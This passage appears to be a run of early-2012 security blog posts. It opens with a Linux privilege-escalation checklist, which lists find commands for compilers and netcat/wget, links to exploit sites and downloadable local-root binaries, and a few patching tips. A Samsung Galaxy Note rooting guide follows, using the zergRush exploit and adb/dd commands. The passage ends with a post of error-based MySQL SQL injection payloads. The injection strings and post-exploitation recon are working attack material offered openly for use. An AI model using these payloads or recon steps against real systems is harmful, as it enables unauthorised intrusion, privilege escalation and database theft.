find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com

Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/%5BCVE%5D
http://cve.mitre.org/cgi-bin/cvename.cgi?name=%5BCVE%5D
http://www.vulnview.com/cve-details.php?cvename=%5BCVE%5D

(Quick) „Common“ exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations
Is any of the above information easy to find?
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?

Scripts – Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net

Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm

Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

rooting Samsung Galaxy Note (GT-N7000)

Posted in Android on Januar 23, 2012 by peak

1. Get Stock ROM from Samsung that is rootable & odin

http://www.sammobile.com/

the zergRush exploit should work with every firmware <= KL3, so get that image; e.g. I'm working with KKA. Next get Odin to flash stock ROMs (don't flash a custom ROM, it increments the internal flash counter)

http://forum.xda-developers.com/attachment.php?attachmentid=815370&stc=1&d=1323799721

2. Downgrade your Galaxy Note with Odin to the rootable stock ROM you just downloaded

Make sure USB Debugging is enabled. Select your ROM in the "PDA" slot. It's simple ..

3. Download drivers and the zergRush Exploit

http://downloadandroidrom.com/file/GalaxyNote/rooting/Samsung_USB_Driver_for_Moblie_Phones_v1_4_6_0.exe

password: samfirmware.com

http://downloadandroidrom.com/file/GalaxyNote/rooting/GalaxyNoteRoot.zip

4. root your device

Make sure USB Debugging is enabled.

Connect your phone with your computer (it should get acknowledged!)

Make sure your USB Memory is connected (swipe down the menu and tap on the connect usb)

run the zerg exploit (simple, check the zip file. I’m using DooMLoRD_v4_ROOT-zergRush)

5. Install ClockworkMod Recovery manually (you need it to flash custom ROMs)

Download http://downloadandroidrom.com/file/GalaxyNote/recovery/GalaxyNoteRecovery.zip

now swap to your shell/cmd (i’m on win7 atm.)

cd \GalaxyNoteRecovery

adb devices

adb push KKA\zImage /data/local/zImage

adb shell

su
dd if=/data/local/zImage of=/dev/block/mmcblk0p5 bs=4096
rm /data/local/zImage
reboot

6. Congratz! You are root, now lets update to newest StockRom

You can do that with Mobile Odin Pro (.apk) or with the just-installed CWM Recovery.

Odin:
Download Mobile Odin Pro and your up-to-date stock ROM (extract it) and copy both the .apk and the .md5 file into the root directory of your phone (disable USB debugging for this and use Windows Explorer). It is also possible that you have 3 files instead of one .md5!
Now Keep the everroot option enabled. flash. done.

CWM:
Copy your rom on root (.md5 files or more). Open CWM and „Flash Stock Firmware“ if you just got md5 always take that when asked. And when asked choose „Keep CF-Root Kernel“. Done.

Some Exotic MySQL Magic

Posted in SQL Injection on Januar 21, 2012 by peak

Finding MySQL columns/tables on v4.x with error reporting enabled:

' AND (SELECT * FROM USER_TABLE) = (1)-- -

MySQL answer:
“Operand should contain 7 column(s)”

' AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1%0,2,3,4,5,6,7 LIMIT 1)-- -

MySQL answer:
“Column ‘usr_u_id’ cannot be null”

SELECT id, name, pass FROM users WHERE id = 1 PROCEDURE ANALYSE()

you have to see the first column output: testdb.users.id

MySQL Error based SQL Injection

select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

/?param=and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)--

/?param=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--